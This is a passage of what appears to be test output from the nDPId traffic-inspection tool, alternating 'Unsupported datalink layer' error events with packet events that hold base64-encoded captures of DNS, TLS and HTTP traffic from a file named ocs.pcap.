layer","datalink":12,"packet_id":34,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787440} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":34,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANCFQQABABqbswKi0AhcV5seZXwG7KAKj\/lpZKDSAEAEk9NUAAAEBCAoANYLsl2cKCg=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":35,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787441} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":35,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANCFRQABABqbrwKi0AhcV5seZXwG7KAKj\/lpZLCiAEAFD8MIAAAEBCAoANYLsl2cKCg=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":36,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787446} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":36,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANCFSQABABqbqwKi0AhcV5seZXwG7KAKj\/lpZMByAEAFj7K4AAAEBCAoANYLsl2cKCg=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":37,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787449} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":37,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANCFTQABABqbpwKi0AhcV5seZXwG7KAKj\/lpZMEyAEAFj7H0AAAEBCAoANYLtl2cKCg=="} 
-00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":38,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787450} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":38,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANCFUQABABqbowKi0AhcV5seZXwG7KAKj\/lpZNECAEAGD6GgAAAEBCAoANYLtl2cKCw=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":39,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787450} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":39,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANCFVQABABqbnwKi0AhcV5seZXwG7KAKj\/lpZNxqAEAGi5W8AAAEBCAoANYLtl2cKCw=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":40,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787450} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":40,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANLBpQABABm1GwKi0Atg60C6hBwG7mRQz4OLMze+AEAES9aEAAAEBCAoANYLtGASnWg=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":41,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787476} 
-00825{"packet_event_id":1,"packet_event_name":"packet","packet_id":41,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":425,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":425,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQABqbBqQABABmvQwKi0Atg60C6hBwG7mRQz4OLMze+AGAESvZQAAAEBCAoANYLvGASnWhcDAQFwKRF6Hs138xqzSSTIriZENoZDD+Ps7xQU8y5e8AFQ1MsOn\/G\/D9cg0ADLlkME0QetySCnbmk6iG8A7aEhl+nQsJKwTwBrTxbZ9TZc9hfCbAirVxtgK+ltCRGV7EniRzNItI7oIVTmnc\/F0wYZKdcjIpaV+MQd9TewqJbzGGUCpPqBYg7KxDXNrQVm3B0Fxt8jMNgbd8Iv0g\/cO7uuKHxD3k8xD2GVoYCpSZ7EhxnTjpDeu9Z6URzQCjNhegZTPS8Mjgv0N4AflmIpmM83mIUN1xgCHuprdzS0qOxqY1sVbBrw8Wn4vVQwIrneHP3XsbO0p+HsV\/4FbzNhQWXl9aPFyUoXwnPqye30vPTjfPZX8Vy5oxfeAr6YVhNmbQdiU5Xr0ioTSseUBvaMdFq\/A6ZX7F9D0QhsgaFq5fR4Eqixt4Yj8GslDlIlZeNYHRALuYtqYYwcIxpmuEAItucppVp8Mw5W7ptH9Nii1iaVsgBO2AE="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":42,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787479} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":42,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANGAeQABABlqlwKi0AomHgc6vnwBQfAzi7h3gADyAEAD1OwIAAAEBCAoANYLwvXlNHw=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":43,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787495} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":43,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANJwkQABABqbFwKi0ArL40Da8egBQwI4he\/tL5z2AEAE9NLsAAAEBCAoANYLyRwX9Xw=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":44,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787496} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":44,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANGAfQABABlqkwKi0AomHgc6vnwBQfAzi7h3gADyAEQD1Ov8AAAEBCAoANYLyvXlNHw=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":45,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787507} -00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":45,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":77,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":77,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAATYLzQABAETLywKi0AggICAgOJQA1ADki+CcDAQAAAQAAAAAAAAR4bXBwCGRldmljZTA2BGV1MDEIY2FwcHRhaW4DY29tAAABAAE="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":46,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787572} -00504{"packet_event_id":1,"packet_event_name":"packet","packet_id":46,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":186,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":186,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAuiFWQABABqZgwKi0AhcV5seZXwG7KAKj\/lpZNxqAGAGiTIQAAAEBCAoANYL5l2cKCxYDAQBGEAAAQkEEQxTBHkOcJZa3UtHJhNGmWjQ4Dx7bFUjVN2PKz\/PauHV01A0axo1JmqhC6rF7p4wUlQv\/SnWqEFr7cFHdR3jTYhQDAQABARYDAQAwxhVM51WGMvU2teIXXp\/bO+aohaPJkVc3IJXZJLC40\/UHxaprojBHy27xbMJEaHjR"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":47,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787578} 
-00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":47,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANGAgQABABlqjwKi0AomHgc6vnwBQfAzi7x3gAD2AEAD1Ot8AAAEBCAoANYL6vXlNNg=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":48,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787596} -00330{"packet_event_id":1,"packet_event_name":"packet","packet_id":48,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPDy4QABABnydwKi0AomHgzS0VhQCr\/++QwAAAACgAjkI08UAAAIEBbQEAggKADWC+wAAAAABAwMG"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":49,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787735} -00371{"packet_event_id":1,"packet_event_name":"packet","packet_id":49,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":89,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":89,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAWbBrQABABm0fwKi0Atg60C6hBwG7mRQ1VeLMz\/SAGAE9BiIAAAEBCAoANYMJGASoRRUDAQAgW2F2BXSJbEV45GAiWlxvAXydyXjCtrAU+3YX\/LIm0J4="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":50,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787736} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":50,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANLBsQABABm1DwKi0Atg60C6hBwG7mRQ1euLMz\/SAEQE98M8AAAEBCAoANYMJGASoRQ=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":51,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787811} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":51,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANLBtQABABm1CwKi0Atg60C6hBwG7mRQ1e+LMz\/WAEAE98FEAAAEBCAoANYMRGASoug=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":52,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787896} -00504{"packet_event_id":1,"packet_event_name":"packet","packet_id":52,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":186,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":186,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAuiFXQABABqZfwKi0AhcV5seZXwG7KAKj\/lpZNxqAGAGiTGMAAAEBCAoANYMal2cKCxYDAQBGEAAAQkEEQxTBHkOcJZa3UtHJhNGmWjQ4Dx7bFUjVN2PKz\/PauHV01A0axo1JmqhC6rF7p4wUlQv\/SnWqEFr7cFHdR3jTYhQDAQABARYDAQAwxhVM51WGMvU2teIXXp\/bO+aohaPJkVc3IJXZJLC40\/UHxaprojBHy27xbMJEaHjR"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":53,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787983} -00329{"packet_event_id":1,"packet_event_name":"packet","packet_id":53,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPMDbQABABoIGwKi0ArL40DbC2QBQ64tD+QAAAACgAjkIoRgAAAIEBbQEAggKADWDIgAAAAABAwMG"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":54,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788016} 
-00333{"packet_event_id":1,"packet_event_name":"packet","packet_id":54,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPYMlQABAETLQwKi0AggICAgKHQA1ACmDzlLQAQAAAQAAAAAAAANvY3MIbGFiZ2VuY3kCd3MAAAEAAQ=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":55,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788067} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":55,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMDcQABABoINwKi0ArL40DbC2QBQ64tD+t7mVuSAEADljSkAAAEBCAoANYMrRwX98w=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":56,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788082} 
-01207{"packet_event_id":1,"packet_event_name":"packet","packet_id":56,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":715,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":715,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQACy8DdQABABn91wKi0ArL40DbC2QBQ64tD+t7mVuSAGADltWEAAAEBCAoANYMsRwX981BPU1QgL2NhdGFsb2cvdm9kP3Y9MyBIVFRQLzEuMQ0KWC1MZ3ktSHNzLUE6IEZGRTg2OUEyLTMzQUQtQTU0QS1CRUMwLTcyMTBEMDNDODM1Qi0yNTk0RDYzRA0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpYLUxneS1IU1MtU2VydmljZS1JZDogb2ZyLm9jcw0KWC1MZ3ktSFNTLVJvbS1JZDogc2Ftc3VuZy9HVC1QNzUxMC9BbmRyb2lkLzQuMC40L1hXTFA2L2FybXY3bF8xMDAwLjBNSHpfMTk5OC44NEJvZ29NaXBzX2ZlYXR1cmVzKHN3cCxoYWxmLHRodW1iLGZhc3RtdWx0LHZmcCxlZHNwLHZmcHYzLHZmcHYzZDE2LHRscylfY29yZXM9Mi8xMjgweDc1Mi9mYWxzZQ0KQ29udGVudC1MZW5ndGg6IDIxNw0KSG9zdDogb2N1MDMubGFiZ2VuY3kud3MNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEFwYWNoZS1IdHRwQ2xpZW50L1VOQVZBSUxBQkxFIChqYXZhIDEuNCkNCg0KPD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPGxneXJlcXVlc3QgbW9kdWxlPSJDTS9WT0QiPgoJPGFjdGlvbiBuYW1lPSJnZXRDYXRhbG9nRW50cmllcyI+CgkJPHBhcmFtIG5hbWU9IndpdGhDdXN0b21EYXRhIiB2YWx1ZT0iZmFsc2UiLz4KCQk8cGFyYW0gbmFtZT0iZXh0ZXJuYWxJZCIgdmFsdWU9ImZhbHNlIi8+Cgk8L2FjdGlvbj4KPC9sZ3lyZXF1ZXN0Pg=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":57,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788109} -00329{"packet_event_id":1,"packet_event_name":"packet","packet_id":57,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPDlmQABABgl8wKi0ArL40DaPSAG7xoy6SQAAAACgAjkIgeAAAAIEBbQEAggKADWDLwAAAAABAwMG"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":58,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788188} 
-00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":58,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANDlnQABABgmDwKi0ArL40DaPSAG7xoy6Sjpn3PmAEADljD4AAAEBCAoANYM3RwX+EQ=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":59,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788195} -00600{"packet_event_id":1,"packet_event_name":"packet","packet_id":59,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":260,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":260,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQABBDloQABABgiywKi0ArL40DaPSAG7xoy6Sjpn3PmAGADlDAsAAAEBCAoANYM3RwX+ERYDAQDLAQAAxwMBVmhd83GqZqYQO3oMbwUHPK3VU0gJzqNSdwnP4gncj8QAAEYABAAFAC8ANcACwATABcAMwA7AD8AHwAnACsARwBPAFAAzADkAMgA4AArAA8ANwAjAEgAWABMACQAVABIAAwAIABQAEQD\/AQAAWAAAABQAEgAAD29jcy5sYWJnZW5jeS53cwALAAQDAAECAAoANAAyAAEAAgADAAQABQAGAAcACAAJAAoACwAMAA0ADgAPABAAEQASABMAFAAVABYAFwAYABk="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":60,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788316} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":60,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANCFYQABABqbkwKi0AhcV5seZXwG7KAKkhFpZOBSAEAHC4p8AAAEBCAoANYNEl2cK5A=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":61,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788328} 
-00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":61,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMDeQABABoH\/wKi0ArL40DbC2QBQ64tGkd7mVuSwEADl2G4AAAEBCAoANYNFRwX+CwEBBQre5lxQ3uZhvA=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":62,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788329} -00345{"packet_event_id":1,"packet_event_name":"packet","packet_id":62,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMDfQABABoH2wKi0ArL40DbC2QBQ64tGkd7mVuTQEADlJtQAAAEBCAoANYNFRwX+CwEBBRLe5mco3uZslN7mXFDe5mG8"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":63,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788329} -00345{"packet_event_id":1,"packet_event_name":"packet","packet_id":63,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMDgQABABoH1wKi0ArL40DbC2QBQ64tGkd7mVuTQEADlIWgAAAEBCAoANYNFRwX+CwEBBRLe5mco3uZyAN7mXFDe5mG8"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":64,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788353} 
-01893{"packet_event_id":1,"packet_event_name":"packet","packet_id":64,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1209,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":1209,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAEuSFZQABABqJewKi0AhcV5seZXwG7KAKkhFpZOBSAGAHCXrEAAAEBCAoANYNHl2cK5BcDAQSA64QqDP2BWUMcNqI+0cGlP2J\/l2AU1ze1S5U4B\/8xLPWN3fAKvo5QYWryC6yDgqK5pz+PJc78o1pu1ZbKwOgR7+J1U3PYA7kZZWvOEMj8YsNCBHJIfntRMUxwbDUZBVTntgYcA3naC+XyBRk\/NA4H8n0\/n9PJ1Au6jN\/6S6WKKgYrCmj9wIO7i26hpiWhrLcpdh4\/sSEJTObMy+DZKrHgYcb2M8J0v7XjTzhpacsWnvjj+1TKMwTdIeAd16GrFY8eSjxEqZd6fitBrjBR6pKryKu6QxtRy0ikAlnoOvl8QxKaRq6\/OJtFkwg7RiJ2nhgLCNomFDCbLy1ctu89OBlt6tC0JNNs5KK1OOU3L1Z\/8DjujU6MlUx5PcwoXou2tpey0mrOLA0bi\/VC++Pg52QKnubndb0t\/Uyjb9WzqwHjnucfLntRJ7kBBKSP5MyxB5fV7VO+2Zy+c0W1u6TviKu6GS66YmZPX3jXZfG0cykmnMz0S4FlsKxOTa1Yx3NAm9T5Wl\/3vF1X5eWyDGnzsO+edDsDJ9kN9y6nabqEXlG5KC89KM1ZBlzZ10Ik1lrZL\/SZ9RgGdpyG5+5BVrNDtVt8CqjUFlhh0iPLmg8HCCsvYiGDqCnVpuRNJwMiosNrFgyET4X1hHRepmhhNXvwu4Qf6IAM2WawyWyv4pYZx3efCBs83d4aXbOAMcRfVbJTkgxGU+gMvVq5rbp6GNKJoNc6f+zc80sXKmsKuY5wt77rMM9v4JYoqNnmBFncKCL6Ng0a2PnnEAIO31mA0o\/ifRYPteknDNo5nlEz2aXdYmHJs4wG\/SuXR4sz6OMT6LN\/Eadhvy2u7JhV2SQ9km5b32sZj8uYP2yv8rNJKdoiRfRt46VXFWt81V+IgClSSM0fNU8Ti\/D5L1JfzK4tFsI1sur9SJYtyMs6NKuYaUJeW5UMaj39qgEBwxum7p6wiMkiVbN+gEBVK\/A3vE7yeuC+bRdbgrGTGgkMGdAPzr0mm30SitWMlLdWYINu6\/RrVhqCEa72XcjhxGj2C+0IKZi+IpFa2NGGkp9kguNVD8enFsjjMFw7IIVrRzFs1D8vh5M5iLVEOt7frnVgirg2s9OI52Kh3Cuii2eWl2WyIbOpl3E\/\/wy9+FEZ4+EDVAtT0LmnHECSASuoLCZHSYz5T2g3SnsjRHchtRfzlOlm2x3z91NieOza1cMuS61sXMExHzhMFqqwv4DbJqC\/c3oZ1tsBsA57rhz2acm4we6SjUJQo7hdOGs+SmZl58\/Q\/T7mVWciR+e8og4Yah7wL45\/xTgiAOfG979HIK6P2gI9IpbxZzGdiQYQwSes1V6IjBQxvxVfsRQqH1oCrSGrGuHTX5VQGbEbuAlMAJ39JXNwjKCi2nmdUDmqfi\/eCXYppjGRK9r5YUyNq\/czKuW\/tLmMgNmUeVl5oiD6ygEpTWQ+Cu1611AbpqSwsCNkMFsQwE1hENEJtXtmUOQfv3mKIer0C+MpPNBaMGcci9tEBvOPQnOtw\/iu5e+o+uUDY5reGZ0v4wbdjWI7"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":65,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788398} -00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":65,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":80,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":80,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAUMDhQABABoHswKi0ArL40DbC2QBQ64tGkd7mVuTwEADlLGgAAAEBCAoANYNMRwX+CwEBBRre5ojX3uaOQ97mZyje5nIA3uZcUN7mYbw="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":66,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788400} -00345{"packet_event_id":1,"packet_event_name":"packet","packet_id":66,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMDiQABABoHzwKi0ArL40DbC2QBQ64tGkd7mVuTQEADl0yoAAAEBCAoANYNMRwX+CwEBBRLe5lxQ3uZyAN7miNfe5o5D"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":67,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788467} -00600{"packet_event_id":1,"packet_event_name":"packet","packet_id":67,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":260,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":260,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQABBDlpQABABgixwKi0ArL40DaPSAG7xoy6Sjpn3PmAGADlC+8AAAEBCAoANYNTRwX+ERYDAQDLAQAAxwMBVmhd83GqZqYQO3oMbwUHPK3VU0gJzqNSdwnP4gncj8QAAEYABAAFAC8ANcACwATABcAMwA7AD8AHwAnACsARwBPAFAAzADkAMgA4AArAA8ANwAjAEgAWABMACQAVABIAAwAIABQAEQD\/AQAAWAAAABQAEgAAD29jcy5sYWJnZW5jeS53cwALAAQDAAECAAoANAAyAAEAAgADAAQABQAGAAcACAAJAAoACwAMAA0ADgAPABAAEQASABMAFAAVABYAFwAYABk="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":68,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788471} 
-00345{"packet_event_id":1,"packet_event_name":"packet","packet_id":68,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMDjQABABoHywKi0ArL40DbC2QBQ64tGkd7mVuTQEADlzbcAAAEBCAoANYNTRwX+CwEBBRLe5lxQ3uZ3bN7miNfe5o5D"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":69,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788472} -00345{"packet_event_id":1,"packet_event_name":"packet","packet_id":69,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMDkQABABoHxwKi0ArL40DbC2QBQ64tGkd7mVuTQEADlzJAAAAEBCAoANYNTRwX+CwEBBRLe5lxQ3uZ4k97miNfe5o5D"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":70,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788477} 